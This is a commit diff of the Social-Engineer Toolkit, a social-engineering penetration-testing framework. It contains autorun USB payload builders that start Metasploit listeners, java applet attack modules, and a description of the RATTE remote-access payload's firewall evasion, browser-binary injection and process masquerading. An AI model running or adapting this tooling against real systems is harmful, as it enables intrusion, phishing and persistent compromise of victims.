prompt=raw_input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
prompt=str.lower(prompt)
if prompt == "no" or prompt == "n":
prompt="NO"
print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")

4
modules/readme.txt Normal file
View file

@ -0,0 +1,4 @@
This is a new section to add your own modules, you can use function calls like:
Read the readme/User_Manual.pdf on how to create your own SET modules.

13
modules/test_module.example Normal file
View file

@ -0,0 +1,13 @@
#!/usr/bin/env python
# These are required fields
from src.core.setcore import *
import sys
MAIN = " This is a test module"
AUTHOR = " Dave - davek@secmaniac.com"
# def main(): header is required
def main():
java_applet_attack("https://gmail.com","443","reports/")
pause=raw_input(" This module has finished completing. Press <enter> to continue")

13
modules/test_module.readme Normal file
View file

@ -0,0 +1,13 @@
#
# These are required fields
#
from src.core.setcore import *
import sys
MAIN="This is a test module"
AUTHOR="Dave - davek@secmaniac.com"
# def main(): header is required
def main():
java_applet_attack("https://gmail.com","443","reports/")
pause=raw_input("This module has finished completing. Press <enter> to continue")

1528
readme/CHANGES Normal file
View file

File diff suppressed because it is too large Load diff

63
readme/CREDITS Normal file
View file

@ -0,0 +1,63 @@
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Special thanks to the following people who have contributed to SET:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* Infection Guide Using Java/VbScript by AnalyseR: http://www.exploit-db.com/papers/12991/
* The Social Engineer Framework http://social-engineer.org
* LoganWHD for his efforts on the Framework and testing out the pre-alpha of SET.
* Elwood for his testing out and bug reporting through the release.
* HD Moore for Metasploit of course!
* Special thanks to Thomas Werth and his Java Applet attack, it is amazing!!
* Special thanks to Kyle Osborn for providing the Man Left in the Middle attack
* Special thanks to Ernest for the SSL idea for Credential Harvesting
* Greg Foss for reporting a local XSS vuln with credential harvester/tabnabbing
* Kevin Mitnick for new additions, ideas, improvements, testing, and Java Repeater fix!
* white_sheep, emgent, and the Back|Track crew for the web jacking attack vector
* Garland for the BeEF PowerShell addon
* Crag Balding for the patch to fix a bug in web cloner
* Lampis Alevizos for the repeater java_applet idea
* Thomas Roth for the patch to the java_applet.pde teensy fix
* Didier Stevens for his disitool that does the digital signature stealing
* Thanks to Matt for figuring out the <frame> issues with the docbase attack and help with the java repeater
* Jim O'Gorman (elwood) for the UNC path attack idea
* Peter Osterberg for the wscript modifications to support Windows 7
* Thanks for PadZero for the multi-language support in Teensy HID and bug fixes
* Special thanks to muts for the paramiko SSH tunneling idea!!
* Hugo Caron (y0ug) for the new gnome_wget.pde teensy addition
* Thanks to sami8007 and Trcx for the dsniff addition to SET
* Jonathan Murray for the email priority addition to the mass mailer and spear phishing attack modules
* Special thanks to the TB-Security.com team for creating the SMS spoofing.
* Thomas Werth, for his addition to SET with RATTE
* Elwood for his idea on the wireless attack vector
* Mister X for allowing airbase-ng to be included into SET
* Thanks for Brandon Murphy for the report on the bug for download in the SET interactive shell and some feature ideas
* Thanks for pr1me for bringing to my attention a couple of bugs and the fixes for them
* Larry Pesce, Luca Grembo for bug reports
* Chris John Riley for his list of bugs and feature requests... I'm still working on them! :)
* RejectedManiac for the fix on the wireless access point channel specification
* Darkther4py for finding a bug in the SET create payload/ratte issue
* Josh Kelley (winfang98) for his awesome stuff with the teensy and help with the presentations at BSIDES and Defcon
* To digip for the version 2.0 idea!
* To Marc Doudiet for working on the vbs version of the teensy exe converter
* Thanks to Jose Hernandez for the bug reports!
* Bernardo Damele for shellcodeexec
* Thanks to Matthew Graeber for the powershell injection technique http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
* Dale Lakes for his additions into check_mssql
* Dale Pearson for finding all the bugs in my code :)
* Leg3nd for some fixes on the java applet
* f8lerror for reporting the multiattack bug
* Thanks to Olie and his unnamed coworker for a quick patch to define users home path versus static root directory
* Thanks to Stephen Haywood for his patch to the smtp module for bug fix
* Thanks to Justin Elze for the idea on the QRCode Attack vector
* Thanks to chap0 for the phishing email template added to the phishing attack vector
* Thanks for Jeremy Miller for the DEPLOY_BINARIES idea and being able to turn them off and only use POWERSHELL_INJECTION
* Python shellcode injection from Debasish Mandal
* Credit to jduck for posting the pastebin of the PoC for the java applet zero day *hugs*
* Offensive-Security's Peensy project - http://www.offensive-security.com/offsec/advanced-teensy-penetration-testing-payloads/
The Social-Engineer Development Team:
Dave Kennedy (ReL1K)
JR DePre (pr1me)
Thomas Werth
Joey Furr (j0fer)

26
readme/LICENSE Normal file
View file

@ -0,0 +1,26 @@
Copyright 2012, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer
in the documentation and/or other materials provided with the distribution.
* Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.
Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit
is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever
see the creator of SET in a bar, you are required to give him a hug and buy him a beer. Hug must last at least 5 seconds. Author
holds the right to refuse the hug or the beer.

15
readme/RATTE_README.txt Normal file
View file

@ -0,0 +1,15 @@
RATTE (Remote Administration Tool Tommy Edition) is a payload and third party module added/created to SET by
Thomas Werth.
A couple of things to note about RATTE is that it's main purpose and design is to completely evade egress and firewall based restrictions by leveraging purely HTTP communications for the commands back and forth.
RATTE has been extend to be very customizeable.
For now you can set:
- Connect Back IP
- Connect Back Port
- Wheater RATTE is persistent or not (example: For network Firewall testing, there is no need for beeing persistent. In a penetration test things may look different)
- a custom filename which RATTE uses for running so local firewalls and user may be fooled using names like iexplore.exe or firefox.exe and on ...
If RATTE is persistent, it tries on NTFS Systems to inject itself into Default Browser file binary and replaces
the executables with a portion of its own code in it as well. If this fails RATTE will save itself as autorun app using custom filename specified. If this one is missing it will go as iexplore.exe.
RATTE relies on communications to microsoft.com to identify the path out of the network.

15
readme/README Normal file
View file

@ -0,0 +1,15 @@
Social-Engineer Toolkit (SET)
Copyright 2011 The Social-Engineer Toolkit (SET)
Written by: David Kennedy (ReL1K) @ www.trustedsec.com
Development Team: Thomas Werth, Joey Furr (j0fer), JR DePre (pr1me)
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use
this for illegal purposes period.
Any modifications, changes, or alterations to this application is acceptable, however, any public releases utilizing
this code must be approved by its creator. Check the LICENSE file for more information.
The SET is designed to make complex social engineering tasks relatively simple for you by allowing you to utilize
a robust framework for penetration tests.

BIN
readme/User_Manual.pdf Normal file
View file

Binary file not shown.

178
set Executable file
View file

@ -0,0 +1,178 @@
#!/usr/bin/python
from src.core.setcore import *
from src.core.menu import text
from config.update_config import update_config
import os
import subprocess
import sys
import shutil
import re
#########################################
# The Social-Engineer Toolkit (SET) #
# Written by: David Kennedy (ReL1K) #
# Email: davek@trustedsec.com #
#########################################
#
# this is the main menu structure for SET
# main menu
# grab the operating system
operating_system = check_os()
# update the main config per load
update_config()
# chmod routine
if operating_system == "posix":
# change permissions if nix
subprocess.Popen("chmod +x set-automate;chmod +x set-update;chmod +x setup.py;chmod +x set-proxy;chmod +x src/payloads/ratte/ratteserver;chmod +x src/payloads/set_payloads/listener.py", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# remove old files
for root, dirs, files in os.walk('src/program_junk/'):
for f in files:
try:
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)
if not match:
os.unlink(os.path.join(root, f))
# if they are being used then ignore
except: pass
# loop through all the directories
for d in dirs:
try:
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", d)
if not match:
shutil.rmtree(os.path.join(root, d))
except: pass
# if windows then do some stuff
if operating_system == "posix":
################################################
# ROOT CHECK
################################################
if os.geteuid() != 0:
print "\n The Social-Engineer Toolkit (SET) - by David Kennedy (ReL1K)"
print "\n Not running as root. \n\nExiting the Social-Engineer Toolkit (SET).\n"
exit_set()
if operating_system != "windows":
check_pexpect()
# if there isn't a set_config.py file yet, create one
if not os.path.isfile("config/set_config.py"):
update_config()
check_beautifulsoup()
define_version = get_version()
cleanup_routine()
# create the set.options routine
filewrite = file("src/program_junk/set.options", "w")
filewrite.write("{This is the main SET configuration file for all options used in SET}\n")
filewrite.close()
try:
# Remove old Signed_Updates
if os.path.isfile("src/program_junk/Signed_Update.jar"):
os.remove("src/program_junk/Signed_Update.jar")
# intitial user menu
if not os.path.isfile("src/agreement4"):
fileopen = file("readme/LICENSE", "r")
for line in fileopen:
print line.rstrip()
print bcolors.RED + """
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are
not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting
yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN
choice = raw_input("\nDo you agree to the terms of service [y/n]: ")
if choice == "yes" or choice == "y":
filewrite = file("src/agreement4", "w")
filewrite.write("user accepted")
filewrite.close()
print bcolors.ENDC
else:
print "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC
sys.exit()
while 1:
show_banner(define_version,'1')
show_main_menu = create_menu(text.main_text, text.main_menu)
# special case of list item 99
print '\n 99) Exit the Social-Engineer Toolkit\n'
# mainc ore menu
main_menu_choice = (raw_input(setprompt("0", "")))
# funny
if main_menu_choice == "hugs":
print_warning("Have you given someone a hug today? Remember a hug can change the world.")
pause = raw_input("\nPlease give someone a hug then press {return} to continue.")
# funny2
if main_menu_choice == "derbycon":
print_warning(bcolors.BOLD + "YAYYYYYYYYYYYYYYYYYYYYYY DerbyCon.\n\nDerbyCon 3.0 -- September 25th through September 29th 2012" + bcolors.ENDC)
pause = raw_input(bcolors.BOLD + "\nDon't miss it! Sep 25 - Sep 29th! Press {return} to continue." + bcolors.ENDC)
# quit out
if main_menu_choice == 'exit' or main_menu_choice == "99" or main_menu_choice == "quit":
exit_set()
# cleans up stale processes from SET
try:
# kill anything python running on 80
kill_proc("80","python")
# kill anything on 443 ruby which is generally a rogue listener
kill_proc("443", "ruby")
except: pass
# load set
if main_menu_choice == '1':
try:
reload(src.core.set)
except:
import src.core.set
# load fasttrack
if main_menu_choice == '2':
try: reload(src.core.fasttrack)
except: import src.core.fasttrack
# third party modules
if main_menu_choice == '3':
try: reload(src.core.module_handler)
except: import src.core.module_handler
# update metasploit
if main_menu_choice == '4':
update_metasploit()
# update set
if main_menu_choice == '5':
update_set()
# credits
if main_menu_choice == '6':
update_config()
# update config
if main_menu_choice == '7':
help_menu()
# handle keyboard interrupts
except KeyboardInterrupt:
print "\n\nThank you for " + bcolors.RED+"shopping" + bcolors.ENDC+" with the Social-Engineer Toolkit.\n\nHack the Gibson...and remember...hugs are worth more than handshakes.\n"
# handle exceptions
except Exception, error:
log(error)
print "\n\n[!] Something went wrong, printing the error: "+ str(error)
# cleanup routine
cleanup_routine()

101
set-automate Executable file
View file

@ -0,0 +1,101 @@
#!/usr/bin/env python
import pexpect
import sys
import os
import time
import subprocess
import re
#
# Simple client mode for SET
#
#
# try to import pexpect
try: import pexpect
# if pexpect fails
except ImportError:
print "\n[*] PEXPECT is required, please download and install before running this..."
print "[*] Exiting SET-AUTOMATE mode..."
sys.exit()
# try to define filename through argument specified during command line mode
try:
filename=sys.argv[1]
# if we through an exception spit out the command line syntax
except IndexError:
print "\nThe Social-Engineer Toolkit Automate - Automatation for SET"
print "\nSimply create a file that has each option you want from menu mode."
print "For example your file should look something like this:"
print "\n2\n2\n2\nhttps://gmail.com\n2\n2\n443\netc.\n"
print "Usage: ./set-automate <filename>"
sys.exit()
# if the filename doesnt exist throw an error
if not os.path.isfile(filename):
print "\n[*] Sorry hoss, unable to locate that filename, try again.\n"
sys.exit()
password="false"
# if the path is around
if os.path.isfile(filename):
try:
print "[*] Spawning SET in a threaded process..."
child=pexpect.spawn("python set")
#child.delaybeforesend = 0
fileopen=file(filename,"r")
for line in fileopen:
line=line.rstrip()
# if we just use enter send default
if line == "": line="default"
match1=re.search("OMGPASSWORDHERE", line)
if match1:
line=line.replace(" OMGPASSWORDHERE", "")
password="true"
if password == "false":
print "[*] Sending command %s to the interface..." % (line)
if password == "true":
print "[*] Sending command [**********] (password masked) to the interface..."
password="false"
if line == "default":
line=""
if line == "CONTROL-C-HERE":
try:
print "[*] This may take a few seconds while SET catches up..."
child.expect("Next line of the body:")
time.sleep(2)
child.sendline("\n")
child.sendcontrol('c')
# if the user is using pexpect < 2.3
except AttributeError:
print "[-] Error: You are running pexpect < 2.3 which is needed for this function"
choice=raw_input("Would you like to install it now yes or no: ")
if choice == "yes" or choice == "y":
subprocess.Popen("wget http://sourceforge.net/projects/pexpect/files/pexpect/Release%202.3/pexpect-2.3.tar.gz;tar -zxvf pexpect-2.3.tar.gz;cd pexpect-2.3;python setup.py install;cd ..;rm -rf pexpect-2*", shell=True).wait()
try:
reload(pexpect)
child.sendcontrol('c')
except:
print "[*] Relaunch the Social-Engineer Toolkit for changes to apply."
sys.exit()
if line != "CONTROL-C-HERE":
child.sendline(line)
print "[*] Finished sending commands, interacting with the interface.."
child.interact()
# sometimes pexpect can throw errors upon exit this handles them
except OSError:
sys.exit()
# handle keyboardinterrupts (controlc)
except KeyboardInterrupt:
print "[*] Control-C detected, exiting the Social-Engineer Toolkit.."
sys.exit()
# handle everything else
except Exception,e: print "[*] Something went wrong, printing error: %s" % str(e)

67
set-proxy Executable file
View file

@ -0,0 +1,67 @@
#!/usr/bin/python
#
# Simple proxy for SET, note will show up in history
#
import pexpect
import sys
import getpass
from src.core.setcore import *
# grab the operating system
operating_system = check_os()
# if windows then do some stuff
if operating_system == "posix":
definepath = os.getcwd()
print "\n[*] Welcome to the SET-Proxy Configuration Utility"
print "\nEnter the proxy setting informatiom below.\n\nExample: http://10.3.1.1:8080\n"
try:
proxy = raw_input("Enter the proxy server: ")
username = raw_input("Enter the username for the proxy (hit enter for none): ")
password = getpass.getpass("Enter the password for the proxy (hit enter for none): ")
except KeyboardInterrupt:
print "\n[!] Exiting the Social-Engineer Toolkit."
sys.exit()
if username != "":
proxy_string = "export http_proxy='http://%s:%s@%s'" % (username,password,proxy)
if username == "":
proxy_string = "export http_proxy='http://%s'" % (proxy)
filewrite = file("src/program_junk/proxy.config", "w")
filewrite.write(proxy_string)
filewrite.close()
from src.core.set import *
def kill_proc(port,flag):
proc=subprocess.Popen("netstat -antp | grep '%s'" % (port), shell=True, stdout=subprocess.PIPE)
stdout_value=proc.communicate()[0]
a=re.search("\d+/%s" % (flag), stdout_value)
if a:
b=a.group()
b=b.replace("/%s" % (flag),"")
subprocess.Popen("kill -9 %s 1> /dev/null 2> /dev/null" % (b), shell=True).wait()
# cleans up stale processes from SET
try:
# kill anything python running on 80
kill_proc("80","python")
# kill anything on 443 ruby which is generally a rogue listener
kill_proc("443", "ruby")
# handle errors
except Exception, error:
log(error)
pass
else:
print "[!] Sorry, this only works on posix (nix) based systems and is not compatible with this operating system."

19
set-update Executable file
View file

@ -0,0 +1,19 @@
#!/usr/bin/env python
#
# simple svn update for set pulling from core modules
#
import sys
from src.core.setcore import *
try:
# pull update set from the core libraries
update_set()
# except keyboard interrupts
except KeyboardInterrupt:
print "\n[!] Control-C detected. Exiting updating SET."
# handle all other errors
except Exception, e: print "\n[!] Something went wrong.. Printing the error: " + e

19
set-web Executable file
View file

@ -0,0 +1,19 @@
#!/usr/bin/env python
import sys,socket
try:
# import the web interface
from src.commandcenter.command_center import *
# except socket errors
except socket.error:
print "[*] Something is already running on the SET web port, please exit it and then restart.\n\n"
# except os errors
except OSError:
pass
# except the rest
except:
print "[*] Exiting the Social-Engineer Toolkit Command-Center"
print "[*] Thank you for shopping at the Social-Engineer Toolkit\n"
pass

41
setup.py Executable file
View file

@ -0,0 +1,41 @@
#!/usr/bin/env python
#
# Python installer
#
# I could use others to build it for me but find I like to customize my installers.
#
import subprocess
import sys
import os
# if nix then run installer
if os.name == "posix":
# give installer a null value
installer=""
try:
# if our command option is true then install stuff
if sys.argv[1] == "install":
installer = True
# if index is out of range then flag options
except IndexError:
print "** SET Dependancy Installer v0.1 **"
print "\nTo install: setup.py install"
# if user specified install then lets to the installation
if installer == True:
# if we trigger on sources.list then we know its ubuntu
if os.path.isfile("/etc/apt/sources.list"):
# force install of debian packages
subprocess.Popen("apt-get --force-yes -y install subversion build-essential python-pexpect python-beautifulsoup python-pefile python-crypto python-openssl python-pymssql", shell=True).wait()
# if sources.list is not available then we're running something offset
else:
print "[*] Your not running a Debian variant. Installer not finished for this type of Linux distro."
print "[*] Install subversion, python-pexpect, python-beautifulsoup, python-crypto, python-openssl, python-pefile manually for all of SET dependancies."
sys.exit()
else:
print "[!] Sorry this installer is not designed for any other system other than posix (*nix). Please install the python depends manually."

0
src/__init__.py Normal file
View file

0
src/autorun/__init__.py Normal file
View file

78
src/autorun/autorun.py Normal file
View file

@ -0,0 +1,78 @@
#!/usr/bin/env python
# simple autorun creation for set
import subprocess
import os
import re
import sys
from src.core.setcore import *
from time import sleep
# [autorun]
# open=autorun.exe
# icon=autorun.ico
# define metasploit path
definepath = os.getcwd()
msf_path = meta_path()
me = mod_name()
trigger = 0
if os.path.isfile("src/program_junk/standardpayload.file"):
trigger = 1
subprocess.Popen("rm -rf autorun/ 1> /dev/null 2> /dev/null;mkdir autorun;cp src/html/msf.exe autorun/program.exe 1> /dev/null 2> /dev/null;cp src/program_junk/msf.exe autorun/program.exe 1> /dev/null 2>/dev/null", shell=True).wait()
if os.path.isfile("src/program_junk/fileformat.file"):
trigger = 2
subprocess.Popen("rm -rf autorun/ 1> /dev/null 2> /dev/null;mkdir autorun;cp src/program_junk/template.pdf autorun/ 1> /dev/null 2>/dev/null", shell=True).wait()
if os.path.isfile("src/program_junk/dll/openthis.wab"):
subprocess.Popen("rm -rf autorun/ 1> /dev/null 2> /dev/null;mkdir autorun;cp src/program_junk/dll/* autorun/ 1> /dev/null 2> /dev/null", shell=True).wait()
trigger = 3
filewrite = file("autorun/autorun.inf", "w")
# if we are using shellcodeexec
alpha_data = ""
if os.path.isfile("src/program_junk/meterpreter.alpha"):
fileopen = file("src/program_junk/meterpreter.alpha", "r")
alpha_data = fileopen.read().rstrip()
# if using standard payloads
if trigger == 1:
payload = "program.exe \"" + alpha_data + "\""
# if using pdf payload
if trigger == 2:
payload = "template.pdf"
if trigger == 3:
payload = "openthis.wab"
filewrite.write("""[autorun]
open=%s
icon=autorun.ico""" % (payload))
filewrite.close()
print_status("Your attack has been created in the SET home directory folder 'autorun'")
print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
# if we are doing the custom pdf
if trigger == 2 or trigger == 3:
# j0fer 06-27-2012 # choice1 = raw_input(setprompt("0", "Create a listener right now [yes|no]"))
choice1 = yesno_prompt("0", "Create a listener right now [yes|no]")
# j0fer 06-27-2012 # if choice1 == "yes" or choice1 == "y" or choice1 == "":
if choice1 == "YES":
filewrite = file("src/program_junk/meta_config", "w")
fileopen = file("src/program_junk/payload.options", "r")
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload " + line[0] + "\n")
filewrite.write("set lhost " + line[1] + "\n")
filewrite.write("set lport " + line[2] + "\n")
filewrite.write("exploit -j")
filewrite.close()
subprocess.Popen("ruby %s/msfconsole -L -n -r %s/src/program_junk/meta_config" % (msf_path, definepath), shell=True).wait()
else:
print_warning("cancelling...")
sleep (2)

0
src/commandcenter/__init__.py Normal file
View file

7
src/commandcenter/auto_detect.site Normal file
View file

@ -0,0 +1,7 @@
<br><br>
<p><b>Network Connection AUTO_DETECT is set to OFF (additional menus)</b><p>
<br>
Enter the IP address to your SET web server (external IP or hostname): <input type="text" name="externalip" size="10" STYLE="font-family : arial; font-size : 7pt" /><br>
<br>
Enter the IP address for the reverse handler (can be the same) (reverse payload): <input type="text" name="reversehandler" size="10" STYLE="font-family : arial; font-size : 7pt" /><br>
<br>

6
src/commandcenter/command_center.html Normal file
View file

@ -0,0 +1,6 @@
<html>
<head></head>
<body>
STUFFHERE
</body>
</html>

1644
src/commandcenter/command_center.py Normal file
View file

File diff suppressed because it is too large Load diff

30
src/commandcenter/config_editor.py Normal file
View file

@ -0,0 +1,30 @@
#!/usr/bin/python
##############################
#
# Configuration Editor
#
##############################
import subprocess
import os
import sys
# grab SET directory
definepath=os.getcwd()
# open configuration file
counter=0
def html_form(description,field):
html_char=(r'%s: <input type="text" name="html_param%s" value="%s"/><br />' % (description,counter,field))
print html_char
# start a loop for the set_config
fileopen=file("config/set_config","r")
for line in fileopen:
# strip any garbage trailing characters
line=line.rstrip()
# grab anything without comments on it
if line[0:1] != "#":
line=line.split("=")
html_form(line[0],line[1])
counter=counter+1

10
src/commandcenter/ettercap.site Normal file
View file

@ -0,0 +1,10 @@
<br><br>
<p><b>Ettercap or DSNIFF is set to ON for ARP/DNS Cache Poisoning (additional menu)</b><p>
<br>
Enter the domain name you want to use (* for everything): <input type="text" name="ettercap_ip" size="10" value="*" /><br />
<br>
Do you want to use bridged mode (ETTERCAP ONLY):<br>
<input type="checkbox" name="ettercap_bridge" value="1"> Yes<br>
<input type="checkbox" name="ettercap_bridge" value="2"> No<br>
Enter the interface for bridged mode (if your using it) ETTERCAP ONLY: <input type="text" name="bridged_handler" size="5" /><br />
<br>

21
src/commandcenter/fasttrack.site Normal file
View file

@ -0,0 +1,21 @@
<div class="post">
<h4 class="dates">The Social-Engineer Toolkit (SET) Fast-Track Attacks</h4>
<div class="entry">
<h2>SET - Fast-Track - Web Interface</h2>
<p>
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing. These will list all of the attack vectors available through the SET interface.
<br>
<br><b>Select the attack vector you want:</b>
<br><br>
<a href="/autopwn">Metasploit Autopwn</a><br><br>
<a href="/mssql_bruter">Microsoft SQL Brute Forcer</a><br><br>
Select the attack vector that you want to perform.
</p>
</div>
</div>
<br><br>
</div>

BIN
src/commandcenter/files/date-icon.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 4.8 KiB

5
src/commandcenter/files/external-tracking.js Normal file
View file

@ -0,0 +1,5 @@
jQuery(document).ready(function(){jQuery('a').each(function(){var a=jQuery(this);var href=a.attr('href');if(href==undefined)
return;var url=href.replace('http://','').replace('https://','');var hrefArray=href.split('.').reverse();var extension=hrefArray[0].toLowerCase();var hrefArray=href.split('/').reverse();var domain=hrefArray[2];var downloadTracked=false;if(jQuery.inArray(extension,analyticsFileTypes)!=-1){downloadTracked=true;a.click(function(){if(analyticsEventTracking=='enabled'){_gaq.push(['_trackEvent','Downloads',extension.toUpperCase(),href]);}else
_gaq.push(['_trackPageview',analyticsDownloadsPrefix+url]);});}
if((href.match(/^http/))&&(!href.match(document.domain))&&(downloadTracked==false)){a.click(function(){if(analyticsEventTracking=='enabled'){_gaq.push(['_trackEvent','Outbound Traffic',href.match(/:\/\/(.[^/]+)/)[1],href]);}else
_gaq.push(['_trackPageview',analyticsOutboundPrefix+url]);});}});});

40
src/commandcenter/files/ga.js Normal file
View file

@ -0,0 +1,40 @@
(function(){var aa="_gat",ba="_gaq",r=true,v=false,w=undefined,ca=document,da="4.7.2",y="length",z="cookie",A="location",ea="_gaUserPrefs",fa="ioo",B="&",C="=",D="__utma=",F="__utmb=",G="__utmc=",ga="__utmk=",H="__utmv=",K="__utmz=",L="__utmx=",ha="GASO=";var M=function(i){return w==i||"-"==i||""==i},ia=function(i){return i[y]>0&&" \n\r\t".indexOf(i)>-1},O=function(i,f,m){var u="-",l;if(!M(i)&&!M(f)&&!M(m)){l=i.indexOf(f);if(l>-1){m=i.indexOf(m,l);if(m<0)m=i[y];u=N(i,l+f.indexOf(C)+1,m)}}return u},ka=function(i){var f=v,m=0,u,l;if(!M(i)){f=r;for(u=0;u<i[y];u++){l=i.charAt(u);m+="."==l?1:0;f=f&&m<=1&&(0==u&&"-"==l||".0123456789".indexOf(l)>-1)}}return f},P=function(i,f){var m=encodeURIComponent;return m instanceof Function?f?encodeURI(i):m(i):escape(i)},
Q=function(i,f){var m=decodeURIComponent,u;i=i.split("+").join(" ");if(m instanceof Function)try{u=f?decodeURI(i):m(i)}catch(l){u=unescape(i)}else u=unescape(i);return u},R=function(i,f){return i.indexOf(f)>-1},S=function(i,f){i[i[y]]=f},U=function(i){return i.toLowerCase()},V=function(i,f){return i.split(f)},la=function(i,f){return i.indexOf(f)},N=function(i,f,m){m=w==m?i[y]:m;return i.substring(f,m)},ma=function(i,f){return i.join(f)},na=function(i){var f=1,m=0,u;if(!M(i)){f=0;for(u=i[y]-1;u>=0;u--){m=
i.charCodeAt(u);f=(f<<6&268435455)+m+(m<<14);m=f&266338304;f=m!=0?f^m>>21:f}}return f},oa=function(){var i=window,f=w;if(i&&i.gaGlobal&&i.gaGlobal.hid)f=i.gaGlobal.hid;else{f=W();i.gaGlobal=i.gaGlobal?i.gaGlobal:{};i.gaGlobal.hid=f}return f},W=function(){return Math.round(Math.random()*2147483647)},pa=function(i,f){var m=ca.createElement("script");m.type="text/javascript";m.src=i;if(f)m.id=f;(ca.getElementsByTagName("head")[0]||ca.getElementsByTagName("body")[0]).appendChild(m)};var ra=function(i,f){this.Wa=i;this.jb=f},sa=function(){function i(m){var u=[];m=m.split(",");for(var l,o=0;o<m.length;o++){l=m[o].split(":");u.push(new ra(l[0],l[1]))}return u}var f=this;f.Ba="utm_campaign";f.Ca="utm_content";f.Da="utm_id";f.Ea="utm_medium";f.Fa="utm_nooverride";f.Ga="utm_source";f.Ha="utm_term";f.Ia="gclid";f.Y=0;f.z=0;f.Ma=15768E6;f.pb=18E5;f.w=63072E6;f.oa=[];f.qa=[];f.ac="cse";f.bc="q";f.kb=5;f.R=i("daum:q,eniro:search_word,naver:query,images.google:q,google:q,yahoo:p,msn:q,bing:q,aol:query,aol:encquery,lycos:query,ask:q,altavista:q,netscape:query,cnn:query,about:terms,mamma:query,alltheweb:q,voila:rdata,virgilio:qs,live:q,baidu:wd,alice:qs,yandex:text,najdi:q,aol:q,mama:query,seznam:q,search:q,wp:szukaj,onet:qt,szukacz:q,yam:k,pchome:q,kvasir:q,sesam:q,ozu:q,terra:query,mynet:q,ekolay:q,rambler:words");
f.u=w;f.hb=v;f.h="/";f.S=100;f.ja="/__utm.gif";f.aa=1;f.ba=1;f.v="|";f.$=1;f.Na=1;f.Ka=1;f.c="auto";f.G=1;f.ma=1E3;f.wc=10;f.Hb=10;f.xc=0.2;f.o=w;f.a=document;f.e=window};var ta=function(i){function f(d,a,j,c){var n="",s=0;n=O(d,"2"+a,";");if(!M(n)){d=n.indexOf("^"+j+".");if(d<0)return["",0];n=N(n,d+j[y]+2);if(n.indexOf("^")>0)n=n.split("^")[0];j=n.split(":");n=j[1];s=parseInt(j[0],10);if(!c&&s<o.s)n=""}if(M(n))n="";return[n,s]}function m(d,a){return"^"+ma([[a,d[1]].join("."),d[0]],":")}function u(d,a){var j=d+"; path="+k.h+"; "+a+o.ab();k.a[z]=j}function l(d){var a=new Date;d=new Date(a.getTime()+d);return"expires="+d.toGMTString()+"; "}var o=this,k=i;o.s=(new Date).getTime();
